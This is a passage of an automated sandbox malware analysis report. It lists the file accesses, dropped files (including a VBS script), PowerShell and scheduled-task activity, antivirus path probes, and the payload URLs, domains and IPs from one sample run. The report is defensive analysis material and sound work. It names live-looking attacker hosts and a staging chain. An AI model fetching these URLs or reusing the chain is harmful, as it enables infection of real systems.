ecb30886406e3f776ff7bc3834de849944471e626ff148bed2fa389d02866044 | c:\users\keecfmwgj\appdata\local\microsoft\windows\temporary internet files\content.ie5\pmmr5k9k\gradients_light[2].png, c:\users\keecfmwgj\appdata\local\microsoft\windows\temporary internet files\content.ie5\pmmr5k9k\gradients_light[1].png | Downloaded File | 403 bytes | image/png | - | CLEAN
e2cc2fa5b12df505e33dd1b9741d8a58696f0f06ea4b488a468590971f28c17b | - | Downloaded File | 534.72 KB | text/plain | - | CLEAN
818fbd88425db09ce3b0f82df9795a1504b885a1680da06332b394e8a2a88e24 | - | Downloaded File | 44.67 KB | text/plain | - | CLEAN
387af277a3e8c36dcdb13e5688cdcbfb6b94fb325fbdccf2b326cf207f036cad | - | Downloaded File | 303 bytes | text/html | - | CLEAN
Filename
File Name Category Operations Verdict
C:\Windows\SysWOW64\mshta.exe Accessed File Access CLEAN
Win.ini Accessed File Access, Read CLEAN
C:\Windows\SysWOW64\mshtml.dll Accessed File Access CLEAN
System Paging File Accessed File Access CLEAN
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternet Files\Content.IE5\MM5O9XQS\3822632116-css_bundle_v2[1].css
Downloaded File Access, Read CLEAN
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternet Files\Content.IE5\PMMR5K9K\3046902713-ieretrofit[1].js
Downloaded File Access, Read CLEAN
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternet Files\Content.IE5\X9OHK109\authorization[1].css
Downloaded File Access, Read CLEAN
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternet Files\Content.IE5\PMMR5K9K\css[1].txt
Downloaded File Access, Read CLEAN
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternet Files\Content.IE5\MM5O9XQS\maia[1].css
Downloaded File Access, Read CLEAN
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternet Files\Content.IE5\X9OHK109\mem5YaGs126MiZpBA-UN_r8OUuht[1].eot
Downloaded File Access, Read CLEAN
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternet Files\Content.IE5\RIJUQL1C\281434096-static_pages[1].css
Downloaded File Access, Read CLEAN
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternet Files\Content.IE5\X9OHK109\cookienotice[1].js
Downloaded File Access, Read CLEAN
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternet Files\Content.IE5\RIJUQL1C\error[1]
Dropped File Access, Create, Write CLEAN
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternet Files\Content.IE5\RIJUQL1C\analytics[1].js
Downloaded File Access, Read CLEAN
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternet Files\Content.IE5\X9OHK109\error[1]
Dropped File Access, Create, Write CLEAN
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternet Files\Content.IE5\RIJUQL1C\warning[1]
Dropped File Access, Create, Write CLEAN
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternet Files\Content.IE5\X9OHK109\2583860411-widgets[1].js
Downloaded File Access, Read CLEAN
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternet Files\Content.IE5\MM5O9XQS\error[1]
Dropped File Access, Create, Write CLEAN
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternetFiles\Content.IE5\MM5O9XQS\kJEjBvgX7BgnkSrUwT8UnLVc38YydejYY-oE_LvN[1].eot
Downloaded File Access, Read CLEAN
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternet Files\Content.IE5\MM5O9XQS\3101730221-analytics_autotrack[1].js
Downloaded File Access, Read CLEAN
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternet Files\Content.IE5\PMMR5K9K\error[1]
Dropped File Access, Create, Write CLEAN
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternet Files\Content.IE5\X9OHK109\warning[1]
Dropped File Access, Create, Write CLEAN
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternet Files\Content.IE5\RIJUQL1C\error[2]
Dropped File Access, Create, Write CLEAN
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternet Files\Content.IE5\PMMR5K9K\warning[1]
Dropped File Access, Create, Write CLEAN
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternet Files\Content.IE5\X9OHK109\error[2]
Dropped File Access, Create, Write CLEAN
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternet Files\Content.IE5\RIJUQL1C\css[1].txt
Downloaded File Access, Read CLEAN
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternetFiles\Content.IE5\PMMR5K9K\pxiDypQkot1TnFhsFMOfGShVF9eK[1].eot
Downloaded File Access, Read CLEAN
X-Ray Vision for Malware - www.vmray.com 41 / 60
DYNAMIC ANALYSIS REPORT#2111629
File Name Category Operations Verdict
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternetFiles\Content.IE5\RIJUQL1C\KFOmCnqEu92Fr1Mu4mxO[1].eot
Downloaded File Access, Read CLEAN
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\TemporaryInternet Files\Content.IE5\X9OHK109\warning[2]
Dropped File Access, Create, Write CLEAN
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Accessed File Access CLEAN
C:\Windows\system32\%SystemRoot%\system32\WindowsPowerShell\v1.0\
Accessed File Access CLEAN
C:\Windows\system32 Accessed File Access CLEAN
C:\Windows\system32\schtasks.exe Accessed File Access CLEAN
C:\Windows Accessed File Access CLEAN
C:\Windows\System32\Wbem Accessed File Access CLEAN
C:\Windows\System32\WindowsPowerShell\v1.0\ Accessed File Access CLEAN
C:\Program Files (x86)\Microsoft Office\root\Client Accessed File Access CLEAN
C:\Program Files (x86)\Microsoft Office\Root\Office16\ Accessed File Access CLEAN
C:\Program Files\WindowsPowerShell\Modules Accessed File Access CLEAN
C:\Program Files\WindowsPowerShell\Modules\Modules.psd1 Accessed File Access CLEAN
C:\Program Files\WindowsPowerShell\Modules\Modules.psm1 Accessed File Access CLEAN
C:\Program Files\WindowsPowerShell\Modules\Modules.cdxml Accessed File Access CLEAN
C:\Program Files\WindowsPowerShell\Modules\Modules.xaml Accessed File Access CLEAN
C:\Program Files\WindowsPowerShell\Modules\Modules.ni.dll Accessed File Access CLEAN
C:\Program Files\WindowsPowerShell\Modules\Modules.dll Accessed File Access CLEAN
C:\ProgramFiles\WindowsPowerShell\Modules\PackageManagement
Accessed File Access CLEAN
C:\Program Files\WindowsPowerShell\Modules\PowerShellGet Accessed File Access CLEAN
C:\ProgramFiles\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1
Accessed File Access, Read CLEAN
C:\Windows\SysWOW64\schtasks.exe Accessed File Access CLEAN
C:\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Dropped File Access, Create, Write, Read CLEAN
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config
Accessed File Access, Read CLEAN
C:\ProgramFiles\WindowsPowerShell\Modules\PackageManagement\PackageManagement.psd1
Accessed File Access CLEAN
C:\ProgramFiles\WindowsPowerShell\Modules\PackageManagement\PackageManagement.psm1
Accessed File Access CLEAN
C:\ProgramFiles\WindowsPowerShell\Modules\PackageManagement\PackageManagement.cdxml
Accessed File Access CLEAN
C:\ProgramFiles\WindowsPowerShell\Modules\PackageManagement\PackageManagement.xaml
Accessed File Access CLEAN
C:\ProgramFiles\WindowsPowerShell\Modules\PackageManagement\PackageManagement.ni.dll
Accessed File Access CLEAN
X-Ray Vision for Malware - www.vmray.com 42 / 60
DYNAMIC ANALYSIS REPORT#2111629
File Name Category Operations Verdict
C:\ProgramFiles\WindowsPowerShell\Modules\PackageManagement\PackageManagement.dll
Accessed File Access CLEAN
C:\ProgramFiles\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1
Accessed File Access, Read CLEAN
C:\Windows\Microsoft.NET\Framework\v4.0.30319\config\machine.config
Accessed File Access CLEAN
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe.config
Accessed File Access CLEAN
C:\ProgramFiles\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\en-US\PowerShellGet.psd1
Accessed File Access CLEAN
C:\ProgramFiles\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\en\PowerShellGet.psd1
Accessed File Access CLEAN
C:\ProgramFiles\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1
Accessed File Access, Read CLEAN
C:\ProgramFiles\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSGet.Format.ps1xml
Accessed File Access CLEAN
C:\ProgramFiles\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSGet.Resource.psd1
Accessed File Access CLEAN
C:\ProgramFiles\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSGetModuleInfo.xml
Accessed File Access CLEAN
C:\ProgramFiles\WindowsPowerShell\Modules\PowerShellGet\PowerShellGet.psd1
Accessed File Access CLEAN
C:\ProgramFiles\WindowsPowerShell\Modules\PowerShellGet\PowerShellGet.psm1
Accessed File Access CLEAN
C:\ProgramFiles\WindowsPowerShell\Modules\PowerShellGet\PowerShellGet.cdxml
Accessed File Access CLEAN
C:\ProgramFiles\WindowsPowerShell\Modules\PowerShellGet\PowerShellGet.xaml
Accessed File Access CLEAN
C:\ProgramFiles\WindowsPowerShell\Modules\PowerShellGet\PowerShellGet.ni.dll
Accessed File Access CLEAN
C:\ProgramFiles\WindowsPowerShell\Modules\PowerShellGet\PowerShellGet.dll
Accessed File Access CLEAN
C:\Users\kEecfMwgj\Documents\WindowsPowerShell\Modules Accessed File Access CLEAN
C:\Program Files (x86)\WindowsPowerShell\Modules Accessed File Access CLEAN
C:\Program Files (x86)\WindowsPowerShell\Modules\Modules.psd1 Accessed File Access CLEAN
C:\Program Files (x86)\WindowsPowerShell\Modules\Modules.psm1 Accessed File Access CLEAN
C:\Program Files (x86)\WindowsPowerShell\Modules\Modules.cdxml Accessed File Access CLEAN
C:\Program Files (x86)\WindowsPowerShell\Modules\Modules.xaml Accessed File Access CLEAN
C:\Program Files (x86)\WindowsPowerShell\Modules\Modules.ni.dll Accessed File Access CLEAN
C:\Program Files (x86)\WindowsPowerShell\Modules\Modules.dll Accessed File Access CLEAN
C:\Program Files(x86)\WindowsPowerShell\Modules\PackageManagement
Accessed File Access CLEAN
C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet Accessed File Access CLEAN
X-Ray Vision for Malware - www.vmray.com 43 / 60
DYNAMIC ANALYSIS REPORT#2111629
File Name Category Operations Verdict
C:\Program Files(x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1
Accessed File Access, Read CLEAN
C:\Program Files(x86)\WindowsPowerShell\Modules\PackageManagement\PackageManagement.psd1
Accessed File Access CLEAN
C:\Program Files(x86)\WindowsPowerShell\Modules\PackageManagement\PackageManagement.psm1
Accessed File Access CLEAN
C:\Program Files(x86)\WindowsPowerShell\Modules\PackageManagement\PackageManagement.cdxml
Accessed File Access CLEAN
C:\Program Files(x86)\WindowsPowerShell\Modules\PackageManagement\PackageManagement.xaml
Accessed File Access CLEAN
C:\Program Files(x86)\WindowsPowerShell\Modules\PackageManagement\PackageManagement.ni.dll
Accessed File Access CLEAN
C:\Program Files(x86)\WindowsPowerShell\Modules\PackageManagement\PackageManagement.dll
Accessed File Access CLEAN
C:\Program Files(x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1
Accessed File Access, Read CLEAN
C:\Program Files(x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\en-US\PowerShellGet.psd1
Accessed File Access CLEAN
C:\Program Files(x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\en\PowerShellGet.psd1
Accessed File Access CLEAN
C:\Program Files(x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1
Accessed File Access, Read CLEAN
C:\Program Files(x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSGet.Format.ps1xml
Accessed File Access CLEAN
C:\Program Files(x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSGet.Resource.psd1
Accessed File Access CLEAN
C:\Program Files(x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSGetModuleInfo.xml
Accessed File Access CLEAN
C:\Program Files(x86)\WindowsPowerShell\Modules\PowerShellGet\PowerShellGet.psd1
Accessed File Access CLEAN
C:\Program Files(x86)\WindowsPowerShell\Modules\PowerShellGet\PowerShellGet.psm1
Accessed File Access CLEAN
C:\Program Files(x86)\WindowsPowerShell\Modules\PowerShellGet\PowerShellGet.cdxml
Accessed File Access CLEAN
C:\Program Files(x86)\WindowsPowerShell\Modules\PowerShellGet\PowerShellGet.xaml
Accessed File Access CLEAN
C:\Program Files(x86)\WindowsPowerShell\Modules\PowerShellGet\PowerShellGet.ni.dll
Accessed File Access CLEAN
C:\Program Files(x86)\WindowsPowerShell\Modules\PowerShellGet\PowerShellGet.dll
Accessed File Access CLEAN
C:\Windows\system32\WindowsPowerShell\v1.0\Modules Accessed File Access CLEAN
C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Modules.psd1
Accessed File Access CLEAN
X-Ray Vision for Malware - www.vmray.com 44 / 60
DYNAMIC ANALYSIS REPORT#2111629
File Name Category Operations Verdict
C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Modules.psm1
Accessed File Access CLEAN
C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Modules.cdxml
Accessed File Access CLEAN
C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Modules.xaml
Accessed File Access CLEAN
C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Modules.ni.dll
Accessed File Access CLEAN
C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Modules.dll Accessed File Access CLEAN
C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitsTransfer Accessed File Access CLEAN
C:\Windows\system32\WindowsPowerShell\v1.0\Modules\CimCmdlets Accessed File Access CLEAN
C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ISE Accessed File Access CLEAN
C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Archive Accessed File Access CLEAN
C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Diagnostics Accessed File Access CLEAN
C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Host Accessed File Access CLEAN
C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Management Accessed File Access CLEAN
C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.ODataUtils Accessed File Access CLEAN
C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Security Accessed File Access CLEAN
C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility Accessed File Access CLEAN
C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.WSMan.Management Accessed File Access CLEAN
C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration Accessed File Access CLEAN
C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSDiagnostics Accessed File Access CLEAN
C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSScheduledJob Accessed File Access CLEAN
C:\Windows\system32\WindowsPowerShell\v1.0\Modules\TroubleshootingPack Accessed File Access CLEAN
C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1 Accessed File Access, Read CLEAN
C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\en-US\Microsoft.PowerShell.Utility.psd1 Accessed File Access CLEAN
C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\en\Microsoft.PowerShell.Utility.psd1 Accessed File Access CLEAN
C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\PSGetModuleInfo.xml Accessed File Access CLEAN
C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Commands.Utility.dll Accessed File Access CLEAN
C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Commands.Utility.dll\Microsoft.PowerShell.Commands.Utility.dll Accessed File Access CLEAN
C:\Program Files\WindowsPowerShell\Modules\Microsoft.PowerShell.Commands.Utility Accessed File Access CLEAN
C:\Program Files\WindowsPowerShell\Modules\Microsoft.PowerShell.Commands.Utility\Microsoft.PowerShell.Commands.Utility.dll Accessed File Access CLEAN
C:\Program Files (x86)\WindowsPowerShell\Modules\Microsoft.PowerShell.Commands.Utility Accessed File Access CLEAN
C:\Program Files (x86)\WindowsPowerShell\Modules\Microsoft.PowerShell.Commands.Utility\Microsoft.PowerShell.Commands.Utility.dll Accessed File Access CLEAN
C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Commands.Utility Accessed File Access CLEAN
C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Commands.Utility\Microsoft.PowerShell.Commands.Utility.dll Accessed File Access CLEAN
C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1 Accessed File Access, Read CLEAN
C:\Program Files\ESET\ESET Security\ecmds.exe Accessed File Access CLEAN
C:\Program Files\Avast Software\Avast\AvastUI.exe Accessed File Access CLEAN
C:\Program Files\Common Files\McAfee\Platform\McUICnt.exe Accessed File Access CLEAN
C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe Accessed File Access CLEAN
C:\Program Files\AVG\Antivirus\AVGUI.exe Accessed File Access CLEAN
C:\Users\Public\OneDrive.vbs Dropped File Delete, Write, Access, Create, Read CLEAN
C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Management\Microsoft.PowerShell.Management.psd1 Accessed File Access, Read CLEAN
C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitsTransfer\BitsTransfer.psd1 Accessed File Access, Read CLEAN
C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Management\en-US\Microsoft.PowerShell.Management.psd1 Accessed File Access CLEAN
C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Management\en\Microsoft.PowerShell.Management.psd1 Accessed File Access CLEAN
C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Management\PSGetModuleInfo.xml Accessed File Access CLEAN
C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Management\Microsoft.PowerShell.Commands.Management.dll Accessed File Access CLEAN
C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Management\Microsoft.PowerShell.Commands.Management.dll\Microsoft.PowerShell.Commands.Management.dll Accessed File Access CLEAN
URL
URL Category IP Address Country HTTP Methods Verdict
http://1230948%[email protected]/p/9.html - 216.58.212.161 - GET MALICIOUS
http://bukbukbukak.blogspot.com/p/9.html - 216.58.212.161 - GET MALICIOUS
https://bukbukbukak.blogspot.com/p/9.html - 216.58.212.161 - GET MALICIOUS
https://bukbukbukak.blogspot.com/js/cookienotice.js - 216.58.212.161 - GET MALICIOUS
http://1230948%[email protected]/p/9.html/ - - - - SUSPICIOUS
https://www.bitly.com/ddwddwwkfwdwoooi - 67.199.248.14 - GET CLEAN
https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_38b5f8d731e148338a8c245338c3ed54.txt - 34.102.176.152 - GET CLEAN
https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_75b3013f776c45d9b3d3d4d971e7234d.txt - 34.102.176.152 - GET CLEAN
https://35d42729-3b2d-44cd-88c7-59a76492301c.usrfiles.com/ugd/35d427_aba34aefaf6944578eaddcbf518b0d51.txt - 34.102.176.152 - GET CLEAN
https://35d42729-3b2d-44cd-88c7-59a76492301c.usrfiles.com/ugd/35d427_02df7f9ae2d74130872a6c4165f7ed60.txt - - - - CLEAN
http://bitly.com/ddwddwwkfwdwoooi - 67.199.248.14 - GET CLEAN
http://pki.goog/gsr1/gsr1.crt - 216.239.32.29 - GET CLEAN
http://www.google.com - 172.217.23.100 - GET CLEAN
http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgRecgPDGLadxIgGIhCsvzDNI0n-EbyITWaDWe2KMgFy - 172.217.23.100 - GET CLEAN
http://180.214.239.67/k/p9i/inc/b61f0c2fdfd137.php - 180.214.239.67 - POST CLEAN
https://fckusecurityresearchermotherfkrs.blogspot.com/p/9_17.html - 216.58.212.161 - GET CLEAN
https://fckusecurityresearchermotherfkrs.blogspot.com/js/cookienotice.js - 216.58.212.161 - GET CLEAN
https://www.blogger.com/static/v1/widgets/3822632116-css_bundle_v2.css - - - GET CLEAN
https://www.blogger.com/static/v1/widgets/2583860411-widgets.js - - - GET CLEAN
https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Ffckusecurityresearchermotherfkrs.blogspot.com%2Fp%2F9_17.html&type=blog&bpli=1 - 142.250.186.41 - GET CLEAN
https://www.blogger.com/static/v1/jsbin/3101730221-analytics_autotrack.js - - - GET CLEAN
https://www.blogger.com/dyn-css/authorization.css?targetBlogID=644545533916229546&zx=551455ad-7f93-402f-89a1-d9e43c6794f5 - - - GET CLEAN
https://www.blogger.com/blogin.g?blogspotURL=https://fckusecurityresearchermotherfkrs.blogspot.com/p/9_17.html&type=blog - - - GET CLEAN
https://www.blogger.com/static/v1/v-css/281434096-static_pages.css - - - GET CLEAN
https://fonts.googleapis.com/css?family=Open+Sans:300 - 142.250.74.202 - GET CLEAN
https://fonts.googleapis.com/css?lang=de&family=Product+Sans|Roboto:400,700 - 142.250.74.202 - GET CLEAN
https://www.google-analytics.com/analytics.js - - - GET CLEAN
https://accounts.google.com/ServiceLogin?continue=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://bukbukbukak.blogspot.com/... ...s://www.blogger.com/blogin.g?blogspotURL%3Dhttps://bukbukbukak.blogspot.com/p/9.html%26type%3Dblog%26bpli%3D1&passive=true&go=true - 142.250.185.237 - GET CLEAN
https://www.blogger.com/dyn-css/authorization.css?targetBlogID=3230375044160936909&zx=74bb4738-53be-4905-9fa3-25325b11a73a - - - GET CLEAN
https://www.blogger.com/blogin.g?blogspotURL=https://bukbukbukak.blogspot.com/p/9.html&type=blog - - - GET CLEAN
https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fbukbukbukak.blogspot.com%2Fp%2F9.html&type=blog&bpli=1 - - - GET CLEAN
http://www.google.com/policies/terms/ - - - GET CLEAN
http://support.google.com/websearch/answer/86640 - - - GET CLEAN
https://www.google.com/recaptcha/api.js - - - GET CLEAN
https://fckusecurityresearchermotherfkrs.blogspot.com/favicon.ico - - - GET CLEAN
https://fckusecurityresearchermotherfkrs.blogspot.com - - - GET CLEAN
https://www.blogger.com - - - GET CLEAN
https://www.google.de/intl/de/about/products?tab=jh - - - GET CLEAN
https://myaccount.google.com/?utm_source=OGB&tab=jk&utm_medium=app - - - GET CLEAN
https://www.google.de/webhp?tab=jw - - - GET CLEAN
https://maps.google.de/maps?hl=de&tab=jl - - - GET CLEAN
https://www.youtube.com/?gl=DE&tab=j1 - - - GET CLEAN
https://play.google.com/?hl=de&tab=j8 - - - GET CLEAN
https://news.google.com/?tab=jn - - - GET CLEAN
https://mail.google.com/mail/?tab=jm - - - GET CLEAN
https://meet.google.com/?hs=197 - - - GET CLEAN
https://chat.google.com - - - GET CLEAN
https://contacts.google.com/?hl=de&tab=jC - - - GET CLEAN
https://drive.google.com/?tab=jo - - - GET CLEAN
https://calendar.google.com/calendar?tab=jc - - - GET CLEAN
https://translate.google.de/?hl=de&tab=jT - - - GET CLEAN
https://photos.google.com/?tab=jq&pageId=none - - - GET CLEAN
https://duo.google.com/?usp=duo_ald - - - GET CLEAN
https://www.google.com/chrome/?brand=CHZO&utm_source=google.com&utm_medium=desktop-app-launcher&utm_campaign=desktop-app-launcher&utm_content=chrome-logo&utm_keyword=CHZO - - - GET CLEAN
https://www.google.de/shopping?hl=de&source=og&tab=jf - - - GET CLEAN
https://docs.google.com/document/?usp=docs_alc - - - GET CLEAN
https://docs.google.com/spreadsheets/?usp=sheets_alc - - - GET CLEAN
https://docs.google.com/presentation/?usp=slides_alc - - - GET CLEAN
https://books.google.de/?hl=de&tab=jp - - - GET CLEAN
https://www.blogger.com/?tab=jj - - - GET CLEAN
https://hangouts.google.com - - - GET CLEAN
https://keep.google.com - - - GET CLEAN
https://jamboard.google.com/?usp=jam_ald - - - GET CLEAN
https://earth.google.com/web/ - - - GET CLEAN
https://www.google.de/save - - - GET CLEAN
https://artsandculture.google.com/?hl=de&utm_source=ogs.google.com&utm_medium=referral - - - GET CLEAN
https://ads.google.com/home/?subid=ww-ww-et-g-aw-a-vasquette_ads_cons_1!o2 - - - GET CLEAN
https://podcasts.google.com - - - GET CLEAN
https://stadia.google.com - - - GET CLEAN
https://www.google.com/travel/?dest_src=al - - - GET CLEAN
https://docs.google.com/forms/?usp=forms_alc - - - GET CLEAN
https://accounts.google.com/ServiceLogin?service=blogger&continue=https://www.blogger.com/blogger.g&ec=GAZAHg - - - GET CLEAN
https://www.blogger.com/age-verification.g?blogspotURL=https://fckusecurityresearchermotherfkrs.blogspot.com/p/9_17.html&from=APq4FmCi5NBs1f3axOfaSfoosWI5gDvOWPuVdwMn7HZMV1Hu00EksHZcLZ8-Uz03byZEC6CvHoy-fLnoyhgJ3-myRV-oRFV6mg - - - GET CLEAN
https://www.blogger.com/go/helpcenter - - - GET CLEAN
https://www.blogger.com/go/discuss - - - GET CLEAN
https://www.blogger.com/go/tutorials - - - GET CLEAN
https://www.blogger.com/go/buzz - - - GET CLEAN
https://www.blogger.com/go/devapi - - - GET CLEAN
https://www.blogger.com/go/devforum - - - GET CLEAN
https://www.blogger.com/go/terms - - - GET CLEAN
https://www.blogger.com/go/privacy - - - GET CLEAN
https://www.blogger.com/go/contentpolicy - - - GET CLEAN
https://www.google.de/contact/impressum.html - - - GET CLEAN
https://bukbukbukak.blogspot.com/favicon.ico - - - GET CLEAN
https://bukbukbukak.blogspot.com - - - GET CLEAN
Domain
Domain IP Address Country Protocols Verdict
bukbukbukak.blogspot.com 216.58.212.161 - HTTP, DNS, HTTPS MALICIOUS
www.bitly.com 67.199.248.15, 67.199.248.14 - HTTP, DNS, HTTPS CLEAN
92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com 34.102.176.152 - HTTP, DNS, HTTPS CLEAN
35d42729-3b2d-44cd-88c7-59a76492301c.usrfiles.com 34.102.176.152 - HTTP, DNS, HTTPS CLEAN
bitly.com 67.199.248.15, 67.199.248.14 - HTTP, DNS CLEAN
fckusecurityresearchermotherfkrs.blogspot.com 216.58.212.161 - DNS, HTTPS CLEAN
blogspot.l.googleusercontent.com 216.58.212.161 - DNS CLEAN
pki.goog 216.239.32.29 - HTTP, DNS CLEAN
www.blogger.com 142.250.186.41 - HTTPS CLEAN
accounts.google.com 142.250.185.237 - HTTPS CLEAN
fonts.googleapis.com 142.250.74.202 - DNS, HTTPS CLEAN
www.google.com 172.217.23.100 - HTTP, DNS, HTTPS CLEAN
www.google-analytics.com - - HTTPS CLEAN
media-router.wixstatic.com 34.102.176.152 - DNS CLEAN
gcp.media-router.wixstatic.com 34.102.176.152 - DNS CLEAN
support.google.com - - HTTP CLEAN
www.google.de - - HTTPS CLEAN
myaccount.google.com - - HTTPS CLEAN
maps.google.de - - HTTPS CLEAN
www.youtube.com - - HTTPS CLEAN
play.google.com - - HTTPS CLEAN
news.google.com - - HTTPS CLEAN
mail.google.com - - HTTPS CLEAN
meet.google.com - - HTTPS CLEAN
chat.google.com - - HTTPS CLEAN
contacts.google.com - - HTTPS CLEAN
drive.google.com - - HTTPS CLEAN
calendar.google.com - - HTTPS CLEAN
translate.google.de - - HTTPS CLEAN
photos.google.com - - HTTPS CLEAN
duo.google.com - - HTTPS CLEAN
docs.google.com - - HTTPS CLEAN
books.google.de - - HTTPS CLEAN
hangouts.google.com - - HTTPS CLEAN
keep.google.com - - HTTPS CLEAN
jamboard.google.com - - HTTPS CLEAN
earth.google.com - - HTTPS CLEAN
artsandculture.google.com - - HTTPS CLEAN
ads.google.com - - HTTPS CLEAN
podcasts.google.com - - HTTPS CLEAN
stadia.google.com - - HTTPS CLEAN
IP
IP Address Domains Country Protocols Verdict
172.217.23.100 www.google.com United States HTTP, TCP, DNS, HTTPS MALICIOUS
34.102.176.152 gcp.media-router.wixstatic.com, media-router.wixstatic.com, 92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com, 35d42729-3b2d-44cd-88c7-59a76492301c.usrfiles.com United States TCP, DNS, HTTPS MALICIOUS
180.214.239.67 - Vietnam TCP, HTTP MALICIOUS
192.168.0.1 - - UDP, DNS CLEAN
216.58.212.161 blogspot.l.googleusercontent.com, bukbukbukak.blogspot.com, fckusecurityresearchermotherfkrs.blogspot.com United States HTTP, TCP, DNS, HTTPS CLEAN
